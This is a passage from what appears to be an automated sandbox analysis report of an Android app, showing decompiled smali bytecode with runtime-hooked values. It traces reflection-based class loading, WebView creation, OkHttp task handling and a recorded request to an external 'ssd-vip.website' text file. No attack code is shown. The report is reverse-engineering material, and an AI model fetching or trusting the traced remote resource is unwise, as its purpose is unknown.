                        88invoke-virtual {p3, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        90invoke-virtual {p3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        91move-result-object p1
                        93invoke-static {p1}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
                        94move-result-object p1
                        95cond_60: new-array p2, v2, [Ljava/lang/Class;
                        96const-class p3, Landroid/content/Context;
                        97aput-object p3, p2, v1
                        99invoke-virtual {p1, p2}, Ljava/lang/Class;->getConstructor([Ljava/lang/Class;)Ljava/lang/reflect/Constructor;
                        100move-result-object p1
                        101new-array p2, v2, [Ljava/lang/Object;
                        102aput-object p0, p2, v1
                        104invoke-virtual {p1, p2}, Ljava/lang/reflect/Constructor;->newInstance([Ljava/lang/Object;)Ljava/lang/Object;
                        • Time: 693153
                          • This:
                            • public android.webkit.WebView(android.content.Context)
                          • p0: com.MrXnxVip.global.main@ff69451
                          • Return:
                            • android.webkit.WebView{d75d2d VFEDHVC.. ......I. 0,0-0,0}
                        105move-result-object p0
                        106return-object p0
                        Cross References
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.String.length
                        • java.lang.String.valueOf
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Class.forName
                        • java.lang.reflect.InvocationTargetException.getCause
                        • java.lang.RuntimeException.<init>
                        • java.lang.SecurityException.printStackTrace
                        • java.lang.String.charAt
                        • java.lang.Character.isLetterOrDigit
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        Strings
                        • LS_
                        • .designerscripts.
                        • com.MrXnxVip.global.designerscripts.LS_layout
                        • _
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Signature;
                        1value = {
                        2"(",
                        3"Ljava/lang/String;",
                        4"Lanywheresoftware/b4a/BA;",
                        5"Lanywheresoftware/b4a/keywords/LayoutValues;",
                        6"Landroid/view/View;",
                        7"Ljava/util/LinkedHashMap<",
                        8"Ljava/lang/String;",
                        9"Lanywheresoftware/b4a/keywords/LayoutBuilder$ViewWrapperAndAnchor;",
                        10">;IIF",
                        11"Ljava/util/Map<",
                        12"Ljava/lang/String;",
                        13"Ljava/lang/Object;",
                        14">;)V"
                        15}
                        16.end annotation
                        17.annotation system Ldalvik/annotation/Throws;
                        18value = {
                        19Ljava/lang/IllegalArgumentException;,
                        20Ljava/lang/IllegalAccessException;
                        21}
                        22.end annotation
                        23new-instance v0, Ljava/lang/StringBuilder;
                        25invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        27const-string v1, "LS_"
                        29invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        30const/4 v1, 0x0
                        31goto_b:
                        32invoke-virtual {p0}, Ljava/lang/String;->length()I
                        33move-result v2
                        34add-int/lit8 v2, v2, -0x4
                        35if-lt v1, v2, :cond_6c
                        36try_start_13: new-instance v1, Ljava/lang/StringBuilder;
                        38sget-object v2, Lanywheresoftware/b4a/BA;->packageName:Ljava/lang/String;
                        40invoke-static {v2}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
                        41move-result-object v2
                        43invoke-direct {v1, v2}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        45const-string v2, ".designerscripts."
                        47invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        49invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        50move-result-object v0
                        52invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        54invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        55move-result-object v0
                        57invoke-static {v0}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
                        • Time: 693313
                          • p0: com.MrXnxVip.global.designerscripts.LS_layout
                          • Return:
                            • class com.MrXnxVip.global.designerscripts.LS_layout
                            • getName: com.MrXnxVip.global.designerscripts.LS_layout
                        58move-result-object v0
                        59try_end_32: const/4 v1, 0x0
                        60try_start_33:
                        61invoke-static {v1}, Lanywheresoftware/b4a/keywords/LayoutBuilder;->variantToMethod(Lanywheresoftware/b4a/keywords/LayoutValues;)Ljava/lang/String;
                        62move-result-object v2
                        63move-object v1, v0
                        64move-object v3, p2
                        65move-object v4, p1
                        66move-object v5, p3
                        67move-object v6, p4
                        68move-object/from16 v7, p8
                        69move/from16 v8, p5
                        70move/from16 v9, p6
                        71move/from16 v10, p7
                        73invoke-static/range {v1 .. v10}, Lanywheresoftware/b4a/keywords/LayoutBuilder;->runScriptMethod(Ljava/lang/Class;Ljava/lang/String;Lanywheresoftware/b4a/keywords/LayoutValues;Lanywheresoftware/b4a/BA;Landroid/view/View;Ljava/util/Map;Ljava/util/Map;IIF)V
                        74try_end_47:
                        75invoke-static {p2}, Lanywheresoftware/b4a/keywords/LayoutBuilder;->variantToMethod(Lanywheresoftware/b4a/keywords/LayoutValues;)Ljava/lang/String;
                        76move-result-object v2
                        77move-object v1, v0
                        78move-object v3, p2
                        79move-object v4, p1
                        80move-object v5, p3
                        81move-object v6, p4
                        82move-object/from16 v7, p8
                        83move/from16 v8, p5
                        84move/from16 v9, p6
                        85move/from16 v10, p7
                        87invoke-static/range {v1 .. v10}, Lanywheresoftware/b4a/keywords/LayoutBuilder;->runScriptMethod(Ljava/lang/Class;Ljava/lang/String;Lanywheresoftware/b4a/keywords/LayoutValues;Lanywheresoftware/b4a/BA;Landroid/view/View;Ljava/util/Map;Ljava/util/Map;IIF)V
                        88try_end_5b: goto/16 :goto_6b
                        89catch_5c: move-exception v0
                        90new-instance v1, Ljava/lang/RuntimeException;
                        92invoke-virtual {v0}, Ljava/lang/reflect/InvocationTargetException;->getCause()Ljava/lang/Throwable;
                        93move-result-object v0
                        95invoke-direct {v1, v0}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/Throwable;)V
                        96throw v1
                        97catch_67: move-exception v0
                        99invoke-virtual {v0}, Ljava/lang/SecurityException;->printStackTrace()V
                        100catch_6b: return-void
                        101cond_6c: move-object v2, p0
                        103invoke-virtual {p0, v1}, Ljava/lang/String;->charAt(I)C
                        104move-result v3
                        106invoke-static {v3}, Ljava/lang/Character;->isLetterOrDigit(C)Z
                        107move-result v4
                        108if-eqz v4, :cond_7b
                        110invoke-virtual {v0, v3}, Ljava/lang/StringBuilder;->append(C)Ljava/lang/StringBuilder;
                        111goto/16 :goto_80
                        112cond_7b:
                        113const-string v3, "_"
                        115invoke-virtual {v0, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        116goto_80: add-int/lit8 v1, v1, 0x1
                        117goto/16 :goto_b
                        Cross References
                        APIs
                        • java.lang.Thread.holdsLock
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.Thread.currentThread
                        • java.lang.Thread.getName
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.AssertionError.<init>
                        • java.util.List.remove
                        • java.util.Collection.isEmpty
                        • java.util.List.add
                        • java.lang.Object.toString
                        • java.lang.IllegalStateException.<init>
                        Strings
                        • Thread
                        • Thread.currentThread()
                        • MUST hold lock on
                        • Check failed.
                        Position Instruction Meta Information
                        0sget-boolean v0, Lokhttp3/internal/Util;->assertionsEnabled:Z
                        1if-eqz v0, :cond_39
                        3invoke-static {p0}, Ljava/lang/Thread;->holdsLock(Ljava/lang/Object;)Z
                        4move-result v0
                        5if-eqz v0, :cond_b
                        6goto/16 :goto_39
                        7cond_b: new-instance p1, Ljava/lang/AssertionError;
                        8new-instance p2, Ljava/lang/StringBuilder;
                        10invoke-direct {p2}, Ljava/lang/StringBuilder;-><init>()V
                        12const-string p3, "Thread "
                        14invoke-virtual {p2, p3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        16invoke-static {}, Ljava/lang/Thread;->currentThread()Ljava/lang/Thread;
                        17move-result-object p3
                        19const-string v0, "Thread.currentThread()"
                        21invoke-static {p3, v0}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullExpressionValue(Ljava/lang/Object;Ljava/lang/String;)V
                        23invoke-virtual {p3}, Ljava/lang/Thread;->getName()Ljava/lang/String;
                        24move-result-object p3
                        26invoke-virtual {p2, p3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        28const-string p3, " MUST hold lock on "
                        30invoke-virtual {p2, p3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        32invoke-virtual {p2, p0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        34invoke-virtual {p2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        35move-result-object p2
                        37invoke-direct {p1, p2}, Ljava/lang/AssertionError;-><init>(Ljava/lang/Object;)V
                        38check-cast p1, Ljava/lang/Throwable;
                        39throw p1
                        40cond_39:
                        41invoke-virtual {p1}, Lokhttp3/internal/concurrent/Task;->getQueue$okhttp()Lokhttp3/internal/concurrent/TaskQueue;
                        42move-result-object v0
                        44invoke-static {v0}, Lkotlin/jvm/internal/Intrinsics;->checkNotNull(Ljava/lang/Object;)V
                        46invoke-virtual {v0}, Lokhttp3/internal/concurrent/TaskQueue;->getActiveTask$okhttp()Lokhttp3/internal/concurrent/Task;
                        47move-result-object v1
                        48const/4 v2, 0x0
                        49const/4 v3, 0x1
                        50if-ne v1, p1, :cond_4a
                        51const/4 v1, 0x1
                        52goto/16 :goto_4b
                        53cond_4a: const/4 v1, 0x0
                        54goto_4b: if-eqz v1, :cond_83
                        56invoke-virtual {v0}, Lokhttp3/internal/concurrent/TaskQueue;->getCancelActiveTask$okhttp()Z
                        • Time: 699278
                          • This:
                            • Q10000
                          • Return:
                            • false
                        57move-result v1
                        59invoke-virtual {v0, v2}, Lokhttp3/internal/concurrent/TaskQueue;->setCancelActiveTask$okhttp(Z)V
                        60const/4 v2, 0x0
                        61check-cast v2, Lokhttp3/internal/concurrent/Task;
                        63invoke-virtual {v0, v2}, Lokhttp3/internal/concurrent/TaskQueue;->setActiveTask$okhttp(Lokhttp3/internal/concurrent/Task;)V
                        65iget-object v2, p0, Lokhttp3/internal/concurrent/TaskRunner;->busyQueues:Ljava/util/List;
                        67invoke-interface {v2, v0}, Ljava/util/List;->remove(Ljava/lang/Object;)Z
                        68const-wide/16 v4, -0x1
                        69cmp-long v2, p2, v4
                        70if-eqz v2, :cond_70
                        71if-nez v1, :cond_70
                        73invoke-virtual {v0}, Lokhttp3/internal/concurrent/TaskQueue;->getShutdown$okhttp()Z
                        • Time: 699279
                          • This:
                            • Q10000
                          • Return:
                            • false
                        74move-result v1
                        75if-nez v1, :cond_70
                        77invoke-virtual {v0, p1, p2, p3, v3}, Lokhttp3/internal/concurrent/TaskQueue;->scheduleAndDecide$okhttp(Lokhttp3/internal/concurrent/Task;JZ)Z
                        78cond_70:
                        79invoke-virtual {v0}, Lokhttp3/internal/concurrent/TaskQueue;->getFutureTasks$okhttp()Ljava/util/List;
                        80move-result-object p1
                        81check-cast p1, Ljava/util/Collection;
                        83invoke-interface {p1}, Ljava/util/Collection;->isEmpty()Z
                        84move-result p1
                        85xor-int/2addr p1, v3
                        86if-eqz p1, :cond_82
                        88iget-object p1, p0, Lokhttp3/internal/concurrent/TaskRunner;->readyQueues:Ljava/util/List;
                        90invoke-interface {p1, v0}, Ljava/util/List;->add(Ljava/lang/Object;)Z
                        91cond_82: return-void
                        92cond_83: new-instance p1, Ljava/lang/IllegalStateException;
                        94const-string p2, "Check failed."
                        96invoke-virtual {p2}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        97move-result-object p2
                        99invoke-direct {p1, p2}, Ljava/lang/IllegalStateException;-><init>(Ljava/lang/String;)V
                        100check-cast p1, Ljava/lang/Throwable;
                        101throw p1
                        Cross References
                        APIs
                        • java.lang.Thread.holdsLock
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.Thread.currentThread
                        • java.lang.Thread.getName
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.AssertionError.<init>
                        • java.lang.Thread.currentThread
                        • java.lang.Thread.getName
                        • java.lang.Thread.setName
                        • java.lang.Thread.setName
                        • java.lang.Thread.setName
                        Strings
                        • Thread
                        • Thread.currentThread()
                        • MUST NOT hold lock on
                        • currentThread
                        • OkHttp ConnectionPool
                        Position Instruction Meta Information
                        0sget-boolean v0, Lokhttp3/internal/Util;->assertionsEnabled:Z
                        1if-eqz v0, :cond_39
                        3invoke-static {p0}, Ljava/lang/Thread;->holdsLock(Ljava/lang/Object;)Z
                        4move-result v0
                        5if-nez v0, :cond_b
                        6goto/16 :goto_39
                        7cond_b: new-instance p1, Ljava/lang/AssertionError;
                        8new-instance v0, Ljava/lang/StringBuilder;
                        10invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        12const-string v1, "Thread "
                        14invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        16invoke-static {}, Ljava/lang/Thread;->currentThread()Ljava/lang/Thread;
                        17move-result-object v1
                        19const-string v2, "Thread.currentThread()"
                        21invoke-static {v1, v2}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullExpressionValue(Ljava/lang/Object;Ljava/lang/String;)V
                        23invoke-virtual {v1}, Ljava/lang/Thread;->getName()Ljava/lang/String;
                        24move-result-object v1
                        26invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        28const-string v1, " MUST NOT hold lock on "
                        30invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        32invoke-virtual {v0, p0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        34invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        35move-result-object v0
                        37invoke-direct {p1, v0}, Ljava/lang/AssertionError;-><init>(Ljava/lang/Object;)V
                        38check-cast p1, Ljava/lang/Throwable;
                        39throw p1
                        40cond_39:
                        41invoke-static {}, Ljava/lang/Thread;->currentThread()Ljava/lang/Thread;
                        42move-result-object v0
                        44const-string v1, "currentThread"
                        46invoke-static {v0, v1}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullExpressionValue(Ljava/lang/Object;Ljava/lang/String;)V
                        48invoke-virtual {v0}, Ljava/lang/Thread;->getName()Ljava/lang/String;
                        49move-result-object v1
                        51invoke-virtual {p1}, Lokhttp3/internal/concurrent/Task;->getName()Ljava/lang/String;
                        • Time: 699276
                          • This:
                            • OkHttp ConnectionPool
                          • Return:
                            • OkHttp ConnectionPool
                        52move-result-object v2
                        54invoke-virtual {v0, v2}, Ljava/lang/Thread;->setName(Ljava/lang/String;)V
                        55const-wide/16 v2, -0x1
                        56try_start_4f:
                        57invoke-virtual {p1}, Lokhttp3/internal/concurrent/Task;->runOnce()J
                        58move-result-wide v2
                        59try_end_53: monitor-enter p0
                        60try_start_54:
                        61invoke-direct {p0, p1, v2, v3}, Lokhttp3/internal/concurrent/TaskRunner;->afterRun(Lokhttp3/internal/concurrent/Task;J)V
                        63sget-object p1, Lkotlin/Unit;->INSTANCE:Lkotlin/Unit;
                        64try_end_59: monitor-exit p0
                        66invoke-virtual {v0, v1}, Ljava/lang/Thread;->setName(Ljava/lang/String;)V
                        67return-void
                        68catchall_5e: move-exception p1
                        69monitor-exit p0
                        70throw p1
                        71catchall_61: move-exception v4
                        72monitor-enter p0
                        73try_start_63:
                        74invoke-direct {p0, p1, v2, v3}, Lokhttp3/internal/concurrent/TaskRunner;->afterRun(Lokhttp3/internal/concurrent/Task;J)V
                        76sget-object p1, Lkotlin/Unit;->INSTANCE:Lkotlin/Unit;
                        77try_end_68: monitor-exit p0
                        79invoke-virtual {v0, v1}, Ljava/lang/Thread;->setName(Ljava/lang/String;)V
                        80throw v4
                        81catchall_6d: move-exception p1
                        82monitor-exit p0
                        83throw p1
                        APIs
                        • java.lang.String.length
                        • java.lang.String.valueOf
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Integer.valueOf
                        • java.lang.Exception.<init>
                        • java.lang.Exception.printStackTrace
                        • java.lang.Exception.toString
                        • java.lang.Exception.printStackTrace
                        • java.lang.String.valueOf
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.valueOf
                        Strings
                        • Authorization
                        • _responsesuccess
                        • _responseerror
                        Position Instruction Meta Information
                        0new-instance v0, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$OkHttpResponse;
                        2invoke-direct {v0}, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$OkHttpResponse;-><init>()V
                        4iget-object v1, p0, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$ExecuteHelper;->this$0:Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper;
                        6invoke-static {v0, v1}, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$OkHttpResponse;->access$0(Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$OkHttpResponse;Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper;)V
                        7const/4 v1, 0x2
                        8const/4 v2, 0x1
                        9const/4 v3, 0x0
                        10const/4 v4, 0x0
                        11try_start_e:
                        12iget-object v5, p0, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$ExecuteHelper;->this$0:Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper;
                        14iget-object v5, v5, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper;->client:Lokhttp3/OkHttpClient;
                        16invoke-virtual {v5}, Lokhttp3/OkHttpClient;->newBuilder()Lokhttp3/OkHttpClient$Builder;
                        17move-result-object v5
                        19iget-object v6, p0, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$ExecuteHelper;->HttpRequest:Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$OkHttpRequest;
                        20iget v6, v6, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$OkHttpRequest;->timeout:I
                        22invoke-static {v5, v6}, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper;->setTimeout(Lokhttp3/OkHttpClient$Builder;I)V
                        24iget-object v6, p0, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$ExecuteHelper;->HttpRequest:Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$OkHttpRequest;
                        26iget-object v6, v6, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$OkHttpRequest;->builder:Lokhttp3/Request$Builder;
                        28invoke-virtual {v6}, Lokhttp3/Request$Builder;->build()Lokhttp3/Request;
                        29move-result-object v6
                        31invoke-virtual {v6}, Lokhttp3/Request;->body()Lokhttp3/RequestBody;
                        32move-result-object v7
                        33instance-of v7, v7, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$PostPayload;
                        34if-eqz v7, :cond_39
                        36invoke-virtual {v6}, Lokhttp3/Request;->body()Lokhttp3/RequestBody;
                        37move-result-object v7
                        38check-cast v7, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$PostPayload;
                        40iget-object v7, v7, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$PostPayload;->data:[B
                        41if-nez v7, :cond_39
                        42const/4 v7, 0x0
                        43goto/16 :goto_3a
                        44cond_39: const/4 v7, 0x1
                        45goto_3a:
                        46iget-object v8, p0, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$ExecuteHelper;->UserName:Ljava/lang/String;
                        47if-eqz v8, :cond_72
                        49iget-object v8, p0, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$ExecuteHelper;->UserName:Ljava/lang/String;
                        51invoke-virtual {v8}, Ljava/lang/String;->length()I
                        52move-result v8
                        53if-lez v8, :cond_72
                        54new-instance v8, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$B4AAuthenticator;
                        56iget-object v9, p0, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$ExecuteHelper;->UserName:Ljava/lang/String;
                        58iget-object v10, p0, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$ExecuteHelper;->Password:Ljava/lang/String;
                        60invoke-direct {v8, v9, v10}, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$B4AAuthenticator;-><init>(Ljava/lang/String;Ljava/lang/String;)V
                        62invoke-virtual {v5, v8}, Lokhttp3/OkHttpClient$Builder;->authenticator(Lokhttp3/Authenticator;)Lokhttp3/OkHttpClient$Builder;
                        64invoke-virtual {v6}, Lokhttp3/Request;->body()Lokhttp3/RequestBody;
                        65move-result-object v8
                        66instance-of v8, v8, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$PostPayload;
                        67if-eqz v8, :cond_72
                        68if-nez v7, :cond_72
                        70iget-object v8, p0, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$ExecuteHelper;->UserName:Ljava/lang/String;
                        72iget-object v9, p0, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$ExecuteHelper;->Password:Ljava/lang/String;
                        74invoke-static {v8, v9}, Lokhttp3/Credentials;->basic(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
                        75move-result-object v8
                        77invoke-virtual {v6}, Lokhttp3/Request;->newBuilder()Lokhttp3/Request$Builder;
                        78move-result-object v6
                        80const-string v9, "Authorization"
                        82invoke-virtual {v6, v9, v8}, Lokhttp3/Request$Builder;->header(Ljava/lang/String;Ljava/lang/String;)Lokhttp3/Request$Builder;
                        83move-result-object v6
                        85invoke-virtual {v6}, Lokhttp3/Request$Builder;->build()Lokhttp3/Request;
                        86move-result-object v6
                        87cond_72: move-object v9, v6
                        89invoke-virtual {v5, v7}, Lokhttp3/OkHttpClient$Builder;->retryOnConnectionFailure(Z)Lokhttp3/OkHttpClient$Builder;
                        91iget-object v6, p0, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$ExecuteHelper;->this$0:Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper;
                        93invoke-virtual {v5}, Lokhttp3/OkHttpClient$Builder;->build()Lokhttp3/OkHttpClient;
                        94move-result-object v8
                        96iget-object v10, p0, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$ExecuteHelper;->ba:Lanywheresoftware/b4a/BA;
                        97iget v11, p0, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$ExecuteHelper;->TaskId:I
                        98move-object v7, p0
                        100invoke-static/range {v6 .. v11}, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper;->access$0(Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper;Ljava/lang/Runnable;Lokhttp3/OkHttpClient;Lokhttp3/Request;Lanywheresoftware/b4a/BA;I)Lokhttp3/Response;
                        101move-result-object v4
                        102if-nez v4, :cond_88
                        103return-void
                        104cond_88: iput-object v4, v0, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$OkHttpResponse;->response:Lokhttp3/Response;
                        106invoke-virtual {v4}, Lokhttp3/Response;->isSuccessful()Z
                        • Time: 700179
                          • This:
                            • Response{protocol=http/1.1, code=200, message=OK, url=https://ssd-vip.website/lord/web.txt}
                          • Return:
                            • true
                        107move-result v5
                        108if-eqz v5, :cond_c3
                        110iget-object v6, p0, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$ExecuteHelper;->ba:Lanywheresoftware/b4a/BA;
                        112iget-object v5, p0, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$ExecuteHelper;->this$0:Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper;
                        114iget-object v7, v5, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper;->client:Lokhttp3/OkHttpClient;
                        116iget-object v8, p0, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$ExecuteHelper;->this$0:Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper;
                        117iget v9, p0, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$ExecuteHelper;->TaskId:I
                        118new-instance v5, Ljava/lang/StringBuilder;
                        120iget-object v10, p0, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$ExecuteHelper;->this$0:Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper;
                        122invoke-static {v10}, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper;->access$1(Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper;)Ljava/lang/String;
                        123move-result-object v10
                        125invoke-static {v10}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
                        126move-result-object v10
                        128invoke-direct {v5, v10}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        130const-string v10, "_responsesuccess"
                        132invoke-virtual {v5, v10}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        134invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        135move-result-object v10
                        136const/4 v11, 0x1
                        137new-array v12, v1, [Ljava/lang/Object;
                        138aput-object v0, v12, v3
                        139iget v5, p0, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$ExecuteHelper;->TaskId:I
                        141invoke-static {v5}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        142move-result-object v5
                        143aput-object v5, v12, v2
                        145invoke-virtual/range {v6 .. v12}, Lanywheresoftware/b4a/BA;->raiseEventFromDifferentThread(Ljava/lang/Object;Ljava/lang/Object;ILjava/lang/String;Z[Ljava/lang/Object;)Ljava/lang/Object;
                        146goto/16 :goto_12c
                        147cond_c3: new-instance v5, Ljava/lang/Exception;
                        149invoke-direct {v5}, Ljava/lang/Exception;-><init>()V
                        150throw v5
                        151catch_c9: move-exception v5
                        152if-eqz v4, :cond_d9
                        154invoke-virtual {v4}, Lokhttp3/Response;->code()I
                        155move-result v5
                        157invoke-virtual {v4}, Lokhttp3/Response;->message()Ljava/lang/String;
                        158move-result-object v6
                        159if-nez v6, :cond_e1
                        161const-string v6, ""
                        162goto/16 :goto_e1
                        163cond_d9:
                        164invoke-virtual {v5}, Ljava/lang/Exception;->printStackTrace()V
                        166invoke-virtual {v5}, Ljava/lang/Exception;->toString()Ljava/lang/String;
                        167move-result-object v6
                        168const/4 v5, -0x1
                        169goto_e1: if-eqz v4, :cond_f2
                        170try_start_e3:
                        171invoke-virtual {v4}, Lokhttp3/Response;->body()Lokhttp3/ResponseBody;
                        172move-result-object v4
                        174invoke-virtual {v4}, Lokhttp3/ResponseBody;->string()Ljava/lang/String;
                        175move-result-object v4
                        176iput-object v4, v0, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$OkHttpResponse;->errorMessage:Ljava/lang/String;
                        177try_end_ed: goto/16 :goto_f2
                        178catch_ee: move-exception v4
                        180invoke-virtual {v4}, Ljava/lang/Exception;->printStackTrace()V
                        181goto_f2:
                        182iget-object v7, p0, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$ExecuteHelper;->ba:Lanywheresoftware/b4a/BA;
                        184iget-object v4, p0, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$ExecuteHelper;->this$0:Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper;
                        186iget-object v8, v4, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper;->client:Lokhttp3/OkHttpClient;
                        188iget-object v9, p0, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$ExecuteHelper;->this$0:Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper;
                        189iget v10, p0, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$ExecuteHelper;->TaskId:I
                        190new-instance v4, Ljava/lang/StringBuilder;
                        192invoke-static {v9}, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper;->access$1(Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper;)Ljava/lang/String;
                        193move-result-object v11
                        195invoke-static {v11}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
                        196move-result-object v11
                        198invoke-direct {v4, v11}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        200const-string v11, "_responseerror"
                        202invoke-virtual {v4, v11}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        204invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        205move-result-object v11
                        206const/4 v12, 0x0
                        207const/4 v4, 0x4
                        208new-array v13, v4, [Ljava/lang/Object;
                        209aput-object v0, v13, v3
                        210aput-object v6, v13, v2
                        212invoke-static {v5}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        213move-result-object v0
                        214aput-object v0, v13, v1
                        215const/4 v0, 0x3
                        216iget v1, p0, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$ExecuteHelper;->TaskId:I
                        218invoke-static {v1}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        219move-result-object v1
                        220aput-object v1, v13, v0
